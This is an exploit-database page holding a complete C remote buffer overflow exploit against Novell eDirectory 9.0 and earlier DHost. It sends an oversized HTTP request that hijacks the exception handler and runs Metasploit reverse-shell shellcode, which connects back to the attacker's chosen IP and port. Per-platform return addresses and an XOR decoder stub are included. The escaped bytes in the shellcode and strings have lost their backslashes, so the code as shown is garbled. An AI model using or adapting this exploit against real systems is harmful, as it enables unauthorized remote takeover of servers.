[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Novell eDirectory <= 9.0 DHost Remote Buffer Overflow Exploit
# Published : 2006-10-30
# Author : Expanders
# Previous Title : Easy File Sharing Web Server 4 Remote Information Stealer Exploit
# Next Title : PrivateWire Gateway 3.7 Remote Buffer Overflow Exploit (win32)
/*
_______ ________ .__ _____ __
___ __ _ ____ _____ | |__ / | | ____ | | __
/ / /_ / _(__ < ______ | | / | |__/ ___| |/ /
> < _/ | / /_____/ | Y / ^ / ___| <
/__/_ \_____ /___| /______ / |___| /____ | ___ >__|_
/ / / / 3010�6 / |__| / /
* mm. dM8
* YMMMb. dMM8 _____________________________________
* YMMMMb dMMM' [ ]
* `YMMMb dMMMP [ There are doors I have yet to open ]
* `YMMM MMM' [ windows I have yet to look through ]
* "MbdMP [ Going forward may not be the answer ]
* .dMMMMMM.P [ ]
* dMM MMMMMM [ maybe I should go back ]
* 8MMMMMMMMMMI [_____________________________________]
* YMMMMMMMMM www.netbunny.org
* "MMMMMMP
* MxM .mmm
* W"W """
[i] Title: Novell eDirectory <= 9.0 DHost Buffer overflow exploit
[i] Discovered by: Novell
[i] Original code by: FistFuXXer
[i] Exploit by: Expanders
[i] Filename: XHNB-Novell-eDirectory_remote_bof.c
[i] References: http://www.novell.com/
[i] Greatings: x0n3-h4ck - netbunny
[ Research diary ]
After a try of FistFuXXer's perl exploit I started to port the code in C and also use a different exploiting
method. This exploit overwrite the Second Exception Handler to take control of the program flow.
[ Special thanks ]
FistFuXXer
H D Moore
[ Links ]
www.x0n3-h4ck.org
www.netbunny.org
*/
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#define BUFFSIZE 1000 // Buffer size
#define DEADRET "xdexc0xadxde" // this address cause the exception to be called
int banner();
int usage(char *filename);
int inject(char *port, char *ip);
int remote_connect( char* ip, unsigned short port );
char attack[] =
"GET /nds HTTP/1.1rn"
"Host: %srnrn";
/* win32_reverse - EXITFUNC=seh Size=312 Encoder=Pex http://metasploit.com */
char shellcode[] =
"x29xc9x83xe9xb8xd9xeexd9x74x24xf4x5bx81x73x13x3f"
"x61x88x6fx83xebxfcxe2xf4xc3x0bx63x22xd7x98x77x90"
"xc0x01x03x03x1bx45x03x2ax03xeaxf4x6ax47x60x67xe4"
"x70x79x03x30x1fx60x63x26xb4x55x03x6exd1x50x48xf6"
"x93xe5x48x1bx38xa0x42x62x3exa3x63x9bx04x35xacx47"
"x4ax84x03x30x1bx60x63x09xb4x6dxc3xe4x60x7dx89x84"
"x3cx4dx03xe6x53x45x94x0exfcx50x53x0bxb4x22xb8xe4"
"x7fx6dx03x1fx23xccx03x2fx37x3fxe0xe1x71x6fx64x3f"
"xc0xb7xeex3cx59x09xbbx5dx57x16xfbx5dx60x35x77xbf"
"x57xaax65x93x04x31x77xb9x60xe8x6dx09xbex8cx80x6d"
"x6ax0bx8ax90xefx09x51x66xcaxccxdfx90xe9x32xdbx3c"
"x6cx22xdbx2cx6cx9ex58x07x35x61x88x6cx59x09x8cx69"
"x59x32x01x8exaax09x64x96x95x01xdfx90xe9x0bx98x3e"
"x6ax9ex58x09x55x05xeex07x5cx0cxe2x3fx66x48x44xe6"
"xd8x0bxccxe6xddx50x48x9cx95xf4x01x92xc1x23xa5x91"
"x7dx4dx05x15x07xcax23xc4x57x13x76xdcx29x9exfdx47"
"xc0xb7xd3x38x6dx30xd9x3ex55x60xd9x3ex6ax30x77xbf"
"x57xccx51x6axf1x32x77xb9x55x9ex77x58xc0xb1xe0x88"
"x46xa7xf1x90x4ax65x77xb9xc0x16x74x90xefx09x78xe5"
"x3bx3exdbx90xe9x9ex58x6f";
char jmpback[]=
//22 byte xor decoder (0x55)
"xEBx0Fx5Bx33xC9x66x83xE9xE0x80x33x55x43xE2xFAxEBx05xE8xECxFFxFFxFF"
//(20 byte jump-back code -> 256 + 256 + 64 bytes)
"x8CxBBx8Cx21x71xA1x0CxD5x94x5FxC5xABx98xABx98xD5xBCx15xAAxB4";
char jmpover[]=
// 2 bytes jump 6 bytes over - 2 bytes NOP
"xEbx06x90x90";
struct retcodes{char *platform;unsigned long addr;} targets[]= {
{ "eDirectory MFC42U.dll", 0x5f80bbf7 },
{ "Windows NT SP 5/6" , 0x776a1082 }, // ws2help.dll pop esi, pop ebx, retn [Tnx to metasploit]
{ "Windows 2k Universal" , 0x750211a9 }, // ws2help.dll pop ebp, pop ebx, retn [Tnx to metasploit]
{ "Windows XP Universal" , 0x71abe325 }, // ws2help.dll pop ebx, pop ebp, retn [Tnx to metasploit]
{ NULL }
};
int banner() {
printf("n _______ ________ .__ _____ __ n");
printf("___ __\ _ \ ____ \_____ \ | |__ / | | ____ | | __ n");
printf("\ \/ / /_\ \ / \ _(__ < ______ | | \ / | |__/ ___\| |/ / n");
printf(" > <\ \_/ \ | \/ \ /_____/ | Y \/ ^ /\ \___| < n");
printf("/__/\_ \\_____ /___| /______ / |___| /\____ | \___ >__|_ \ n");
printf(" \/ \/ \/ \/ \/ |__| \/ \/ nn");
printf("[i] Title: tNovell eDirectory DHost Buffer overflown");
printf("[i] Perl Code by:tFistFuXXern");
printf("[i] Exploit by: tExpandersnn");
return 0;
}
int usage(char *filename) {
int i;
printf("Usage: t%s <host> <port> <l_ip> <l_port> <targ>nn",filename);
printf(" t<host> : Victim's hostn");
printf(" t<port> : Victim's port :: Default: 8028n");
printf(" t<l_ip> : Local ip address for connectbackn");
printf(" t<l_port> : Local port for connectbackn");
printf(" t<targ> : Target from the list belownn");
printf("# t Platformn");
printf("-----------------------------------------------n");
for(i = 0; targets[i].platform; i++)
printf("%d t %sn",i,targets[i].platform);
printf("-----------------------------------------------n");
exit(0);
}
int inject(char *port, char *ip)
{
unsigned long xorip;
unsigned short xorport;
xorip = inet_addr(ip)^(unsigned long)0x6F88613F;
xorport = htons(atoi( port ))^(unsigned short)0x6F88;
memcpy ( &shellcode[184], &xorip, 4);
memcpy ( &shellcode[190], &xorport, 2);
return 0;
}
int remote_connect( char* ip, unsigned short port )
{
int s;
struct sockaddr_in remote_addr;
struct hostent* host_addr;
memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
if ( ( host_addr = gethostbyname ( ip ) ) == NULL )
{
printf ( "[X] Cannot resolve "%s"n", ip );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons ( port );
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "[X] Socket failed!n" );
exit ( 1 );
}
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( "[X] Failed connecting!n" );
exit ( 1 );
}
return ( s );
}
int main(int argc, char *argv[]) {
int s,position;
unsigned int rcv;
char *buffer,*request;
char recvbuf[256];
banner();
if( (argc != 6) || (atoi(argv[2]) < 1) || (atoi(argv[2]) > 65534) )
usage(argv[0]);
position = 0;
printf("[+] Creating evil buffern");
buffer = (char *) malloc(BUFFSIZE);
request = (char *) malloc(BUFFSIZE + strlen(attack)); // +3 == r + n + 0x00
memset(buffer,0x90,BUFFSIZE); // Fill with nops
inject(argv[4],argv[3]); // Xor port and ip and put them into the shellcode
memset(buffer,0x41,68); // First comes the ascii
position = 68;
memcpy(buffer+position,DEADRET,4);
position = 680 - (strlen(shellcode) + 100); // 680 : Pointer to next Execption structure
memcpy(buffer+position,shellcode,strlen(shellcode));
position += strlen(shellcode)+100;
memcpy(buffer+position,jmpover,4); position += 4;
memcpy(buffer+position,&targets[atoi(argv[5])].addr,4); position += 4;
position += 8; // 8 bytes more nops
memcpy(buffer+position,jmpback,strlen(jmpback)); position += strlen(jmpback);
position += 8; // 8 bytes more nops
memset(buffer+position,0x00,1); // End
sprintf(request,attack,buffer);
printf("[+] Connecting to remote hostn");
s = remote_connect(argv[1],atoi(argv[2]));
sleep(1);
printf("[+] Sending %d bytes of painfull buffern",strlen(buffer));
if ( send ( s, request, strlen (request), 0) <= 0 )
{
printf("[X] Failed to send buffern");
exit ( 1 );
}
printf("[+] Done - Wait for shell on port %sn",argv[4]);
close(s);
free(buffer);
buffer = NULL;
return 0;
}
// www.Syue.com [2006-10-30]